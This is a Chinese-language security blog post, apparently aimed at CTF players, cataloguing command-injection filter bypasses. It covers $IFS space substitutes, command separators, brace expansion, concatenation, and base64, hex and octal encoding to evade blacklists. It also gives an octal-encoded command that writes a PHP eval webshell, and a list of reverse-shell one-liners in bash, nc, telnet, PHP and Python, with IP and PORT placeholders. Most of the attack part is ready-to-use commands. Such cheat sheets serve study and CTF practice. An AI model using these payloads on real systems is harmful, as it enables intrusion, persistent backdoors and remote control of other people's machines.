<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="关于命令执行以及常见的一些绕过过滤的方法"><meta name="keywords" content="命令执行"><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>关于命令执行以及常见的一些绕过过滤的方法 | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#命令执行的一些绕过技巧"><span class="toc-number">1.</span> <span class="toc-text">命令执行的一些绕过技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#①-空格过滤"><span class="toc-number">1.1.</span> <span class="toc-text">① 空格过滤</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#②-一些命令分隔符"><span class="toc-number">1.2.</span> <span class="toc-text">② 一些命令分隔符</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#③-花括号的别样用法"><span class="toc-number">1.3.</span> <span class="toc-text">③ 花括号的别样用法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#④-黑名单绕过"><span class="toc-number">1.4.</span> <span class="toc-text">④ 黑名单绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⑤长度限制"><span class="toc-number">1.5.</span> <span class="toc-text">⑤长度限制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⑥-内联执行"><span class="toc-number">1.6.</span> <span class="toc-text">⑥ 内联执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⑦-通配符"><span class="toc-number">1.7.</span> <span class="toc-text">⑦ 通配符</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⑧反弹shell"><span class="toc-number">1.8.</span> <span class="toc-text">⑧反弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⑨-linux中直接查看文件内容的工具"><span class="toc-number">1.9.</span> <span class="toc-text">⑨ linux中直接查看文件内容的工具</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考："><span class="toc-number">2.</span> <span class="toc-text">参考：</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/123.png"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">幸福不是故事，不幸才是</div><div class="follow-button"><a href="https://github.com/Dar1in9s" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">43</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">19</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/12478.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">关于命令执行以及常见的一些绕过过滤的方法</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-01-19</time><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.6k</span><span class="post-meta__separator">|</span><span>阅读时长: 6 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>命令执行</p>
<a id="more"></a>
<h2 id="命令执行的一些绕过技巧"><a href="#命令执行的一些绕过技巧" class="headerlink" title="命令执行的一些绕过技巧"></a>命令执行的一些绕过技巧</h2><h3 id="①-空格过滤"><a href="#①-空格过滤" class="headerlink" title="① 空格过滤"></a>① 空格过滤</h3><p>空格可以用以下字符串代替：<br><code>&lt; 、&lt;&gt;、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS</code>等</p>
<p><code>$IFS</code>在linux下表示分隔符，但是如果单纯的<code>cat$IFS2</code>,bash解释器会把整个IFS2当做变量名，所以导致输不出来结果，然而如果加一个{}就固定了变量名，同理在后面加个<code>$</code>可以起到截断的作用，但是为什么要用<code>$9</code>呢，因为<code>$9</code>只是当前系统shell进程的第九个参数的持有者，它始终为空字符串。</p>
<h3 id="②-一些命令分隔符"><a href="#②-一些命令分隔符" class="headerlink" title="② 一些命令分隔符"></a>② 一些命令分隔符</h3><blockquote>
<p>linux中：%0a 、%0d 、; 、&amp; 、| 、&amp;&amp;、||<br>windows中：%0a、&amp;、|、%1a（一个神奇的角色，作为.bat文件中的命令分隔符）</p>
</blockquote>
<h3 id="③-花括号的别样用法"><a href="#③-花括号的别样用法" class="headerlink" title="③ 花括号的别样用法"></a>③ 花括号的别样用法</h3><p>在Linux bash中还可以使用<code>{OS_COMMAND,ARGUMENT}</code>来执行系统命令</p>
<p><img align="left" src="https://img-blog.csdnimg.cn/20190915145314225.png"><br><br><br><br><br><br></p>
<h3 id="④-黑名单绕过"><a href="#④-黑名单绕过" class="headerlink" title="④ 黑名单绕过"></a>④ 黑名单绕过</h3><ol>
<li><p>拼接绕过<br> 比如：<code>a=l;b=s;$a$b</code><br> 上面的第二道题目也是利用偶读拼接方法绕过黑名单：<code>a=fl;b=ag;cat $a$b</code></p>
</li>
<li><p>编码绕过<br> <strong>base64：</strong></p>
<blockquote>
<p><code>echo MTIzCg==|base64 -d</code>   其将会打印123<br> <code>echo &quot;Y2F0IC9mbGFn&quot;|base64 -d|bash</code> ==&gt;<code>cat /flag</code></p>
</blockquote>
<p> <strong>hex：</strong></p>
<blockquote>
<p><code>echo &quot;636174202f666c6167&quot; | xxd -r -p|bash</code>    ==&gt;<code>cat /flag</code></p>
</blockquote>
<p> <strong>oct：</strong></p>
 <figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">(<span class="built_in">printf</span> <span class="string">"\154\163"</span>)    ==&gt;ls</span></span><br><span class="line"><span class="meta">$</span><span class="bash">(<span class="built_in">printf</span> <span class="string">"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"</span>) ==&gt;cat /flag</span></span><br><span class="line"><span class="meta">$</span><span class="bash">&#123;<span class="built_in">printf</span>,<span class="string">"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"</span>&#125;|<span class="variable">$0</span>  ==&gt;cat /flag</span></span><br><span class="line"><span class="meta">#</span><span class="bash">可以通过这样来写webshell,内容为&lt;?php @<span class="built_in">eval</span>(<span class="variable">$_POST</span>[<span class="string">'c'</span>]);?&gt;</span></span><br><span class="line"><span class="meta">$</span><span class="bash">&#123;<span class="built_in">printf</span>,<span class="string">"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"</span>&#125; &gt;&gt; 1.php</span></span><br></pre></td></tr></table></figure></li>
<li><p>单引号和双引号绕过<br> 比如：<code>ca&#39;&#39;t flag</code> 或<code>ca&quot;&quot;t flag</code></p>
</li>
<li><p>反斜杠绕过<br> 比如：ca\t fl\ag</p>
</li>
<li><p>利用Shell 特殊变量绕过</p>
<table>
<thead>
<tr>
<th>变量</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>$0</td>
<td>当前脚本的文件名</td>
</tr>
<tr>
<td>$n</td>
<td>传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个参数是1，第二个参数是2。而参数不存在时其值为空。</td>
</tr>
<tr>
<td>$#</td>
<td>传递给脚本或函数的参数个数</td>
</tr>
<tr>
<td>$*</td>
<td>传递给脚本或函数的所有参数，而参数不存在时其值为空。</td>
</tr>
<tr>
<td>$@</td>
<td>传递给脚本或函数的所有参数。，而参数不存在时其值为空。被双引号包函时，与$*稍有不同</td>
</tr>
<tr>
<td>$?</td>
<td>上个命令的推出状态，或函数的返回值</td>
</tr>
<tr>
<td>$$</td>
<td>当前shell进程ID</td>
</tr>
</tbody></table>
<p> <strong>linux shell中$n表示传递给脚本或函数的参数</strong>,其中<code>n</code>是一个数字，表示第几个参数。<br> 例如，第一个参数是1，第二个参数是2。而参数不存在时其值为空。<br> <code>$@</code>表示空<br> 比如：<code>ca$@t fla$@g</code><br> <code>ca$1t fla$2g</code></p>
</li>
</ol>
<h3 id="⑤长度限制"><a href="#⑤长度限制" class="headerlink" title="⑤长度限制"></a>⑤长度限制</h3><p>长度限制可以用<strong>文件构造</strong>的方式来绕过。</p>
<blockquote>
<p>linux下可以用 1&gt;a创建文件名为a的空文件<br>ls -t&gt;test则会将目录按时间排序后写进test文件中<br>sh命令可以从一个文件中读取命令来执行</p>
</blockquote>
<p>利用这些特性，即可以成功绕过长度限制来执行命令。</p>
<h3 id="⑥-内联执行"><a href="#⑥-内联执行" class="headerlink" title="⑥ 内联执行"></a>⑥ 内联执行</h3><p>命令替代，大部分Unix shell以及编程语言如Perl、PHP以及Ruby等都以成对的重音符(反引号)作指令替代，意思是以某一个指令的输出结果作为另一个指令的输入项。<br>例如：<code>echo &quot;a`pwd`&quot;</code><br><img align="left" src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9ibG9nLTEzMDAxNDcyMzUuY29zLmFwLWNoZW5nZHUubXlxY2xvdWQuY29tLzIwMTkwOTE1MTM0ODEyMzk1LnBuZw"><br><br></p>
<p>与此类似的还有<code>$(command)</code>.<br>例如：<code>echo &quot;abcd $(pwd)&quot;</code><br><img align="left" src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9ibG9nLTEzMDAxNDcyMzUuY29zLmFwLWNoZW5nZHUubXlxY2xvdWQuY29tLzIwMTkwOTE1MTQwMDMwOTQ0LnBuZw"><br><br></p>
<h3 id="⑦-通配符"><a href="#⑦-通配符" class="headerlink" title="⑦ 通配符"></a>⑦ 通配符</h3><p>常用的一些linux shell通配符：</p>
<table>
<thead>
<tr>
<th>字符</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td>*</td>
<td>匹配任意长度任意字符</td>
</tr>
<tr>
<td>？</td>
<td>匹配任意单个字符</td>
</tr>
<tr>
<td>[list]</td>
<td>匹配指定范围内(list)任意单个字符，也可以是单个字符组成的集合</td>
</tr>
<tr>
<td>[^list]</td>
<td>匹配指定范围外的任意单个字符或字符集合</td>
</tr>
<tr>
<td>[!list]</td>
<td>同[^list]</td>
</tr>
<tr>
<td>{str1,str2}</td>
<td>匹配str1或者str2字符，也可以是集合</td>
</tr>
<tr>
<td>IFS</td>
<td>由&lt;space&gt;或&lt;tab&gt;或&lt;enter&gt;三者之一组成</td>
</tr>
<tr>
<td>CR</td>
<td>由&lt;enter&gt;产生</td>
</tr>
<tr>
<td>!</td>
<td>执行history中的命令</td>
</tr>
</tbody></table>
<p>其中：</p>
<ul>
<li><input disabled="" type="checkbox"> <code>[...]</code>表示匹配方括号之中的任意一个字符。<br>  比如<code>[aeiou]</code>可以匹配五个元音字母，<code>[a-z]</code>匹配任意小写字母。</li>
<li><input disabled="" type="checkbox"> <code>{...}</code>表示匹配大括号里面的所有模式，模式之间使用逗号分隔。</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">echo</span> d&#123;a,e,i,u,o&#125;g </span></span><br><span class="line">  dag deg dig dug dog</span><br><span class="line"></span><br><span class="line"><span class="meta">#</span><span class="bash">大括号可以嵌套使用</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">echo</span> &#123;j&#123;p,pe&#125;g,png&#125; </span></span><br><span class="line">  jpg jpeg png</span><br><span class="line"><span class="meta">  #</span><span class="bash">&#123;start..end&#125;匹配连续字符 </span></span><br><span class="line"><span class="meta">$</span><span class="bash"> cat /f&#123;0..z&#125;ag </span></span><br><span class="line">  this_is_you_find_flag</span><br></pre></td></tr></table></figure>
<p><code>{...}</code>与<code>[...]</code>有一个很重要的区别。如果匹配的文件不存在，<code>[...]</code>会失去模式的功能，变成一个单纯的字符串，而<code>{...}</code>依然可以展开。</p>
<p><strong>注：上面所有通配符只匹配单层路径，不能跨目录匹配，即无法匹配子目录里面的文件。或者说，?或*这样的通配符，不能匹配路径分隔符（/）。如果要匹配子目录里面的文件，可以写成这样：<code>ls */*.txt</code></strong></p>
<p>合理运用通配符有时可以达到意想不到的效果。<br>例如：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat fla* </span><br><span class="line"><span class="meta">cat$</span><span class="bash">&#123;IFS&#125;fl*</span></span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<img align="left" src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9ibG9nLTEzMDAxNDcyMzUuY29zLmFwLWNoZW5nZHUubXlxY2xvdWQuY29tLzIwMTkwOTE1MTQyNzQyNzQ0LnBuZw">
<br><br><br><br>

<h3 id="⑧反弹shell"><a href="#⑧反弹shell" class="headerlink" title="⑧反弹shell"></a>⑧反弹shell</h3><p>bash方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>sh方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sh &gt;&amp; /dev/tcp/IP/PORT 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>exec方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span> 5&lt;&gt;/dev/tcp/IP/PORT;cat &lt;&amp;5|<span class="keyword">while</span> <span class="built_in">read</span> line;<span class="keyword">do</span> <span class="variable">$line</span> &gt;&amp;5 2&gt;&amp;1;<span class="keyword">done</span></span><br><span class="line"></span><br><span class="line">0&lt;&amp;1;<span class="built_in">exec</span> 1&lt;&gt;/dev/tcp/IP/PORT; sh &lt;&amp;1 &gt;&amp;1 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>nc方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">如果安装了正确的版本（存在-e 选项就能直接反弹shell）</span><br><span class="line">nc -e /bin/sh IP PORT</span><br><span class="line"></span><br><span class="line">如果没有-e选项</span><br><span class="line">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc IP PORT &gt;/tmp/f</span><br><span class="line"></span><br><span class="line">mknod backpipe p; nc IP PORT 0&lt;backpipe | /bin/bash 1&gt;backpipe 2&gt;backpipe</span><br></pre></td></tr></table></figure>
<p>telnet方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mknod backpipe p &amp;&amp; telnet IP PORT 0&lt;backpipe | /bin/bash 1&gt;backpipe</span><br></pre></td></tr></table></figure>

<p>php方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php -r <span class="string">'exec("/bin/bash -i &gt;&amp; /dev/tcp/IP/PORT")'</span></span><br><span class="line"></span><br><span class="line">php -r <span class="string">'$sock=fsockopen("IP",PORT);exec("/bin/bash -i 0&gt;&amp;3 1&gt;&amp;3 2&gt;&amp;3");'</span></span><br></pre></td></tr></table></figure>

<p>python方式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);target=('IP',PORT);s.connect(target);os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])"</span></span><br><span class="line"></span><br><span class="line">python -c <span class="string">"exec(\"import socket,subprocess;s=socket.socket();target=('IP',PORT);s.connect(target)\nwhile 1:proc=subprocess.Popen(s.recv(1024),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"</span></span><br></pre></td></tr></table></figure>

<h3 id="⑨-linux中直接查看文件内容的工具"><a href="#⑨-linux中直接查看文件内容的工具" class="headerlink" title="⑨ linux中直接查看文件内容的工具"></a>⑨ linux中直接查看文件内容的工具</h3><p>cat、tac、more、less、head、tail、nl、sed、sort、uniq、</p>
<h2 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h2><p><a href="http://pupiles.com/shellcode.html" target="_blank" rel="noopener">http://pupiles.com/shellcode.html</a><br><a href="https://chybeta.github.io/2017/08/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/" target="_blank" rel="noopener">https://chybeta.github.io/2017/08/15/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/</a><br><a href="https://blog.zeddyu.info/2019/01/17/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" target="_blank" rel="noopener">https://blog.zeddyu.info/2019/01/17/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2020/01/19/%E5%85%B3%E4%BA%8E%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%BB%A5%E5%8F%8A%E5%B8%B8%E8%A7%81%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E7%9A%84%E6%96%B9%E6%B3%95/">http://dar1in9s.github.io/2020/01/19/%E5%85%B3%E4%BA%8E%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E4%BB%A5%E5%8F%8A%E5%B8%B8%E8%A7%81%E7%9A%84%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E7%9A%84%E6%96%B9%E6%B3%95/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">命令执行</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/01/19/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019%E7%9A%84%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B%E7%B3%BB%E7%BB%9F__HTTP%E5%8D%8F%E8%AE%AE/"><i class="fa fa-chevron-left">  </i><span>极客大挑战2019的服务端检测系统__HTTP协议</span></a></div><div class="next-post pull-right"><a href="/2020/01/19/%E5%85%B3%E4%BA%8EC++%E7%9A%84cin%E7%9A%84%E9%94%99%E8%AF%AF%E8%BE%93%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98%E4%BB%A5%E5%8F%8A%E8%A7%A3%E5%86%B3%E5%8A%9E%E6%B3%95/"><span>关于C++的cin的错误输入的问题以及解决办法</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/12478.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/algolia.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script src="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.js"></script><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/katex-copytex@latest/dist/katex-copytex.min.css"><script src="/js/katex.js"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>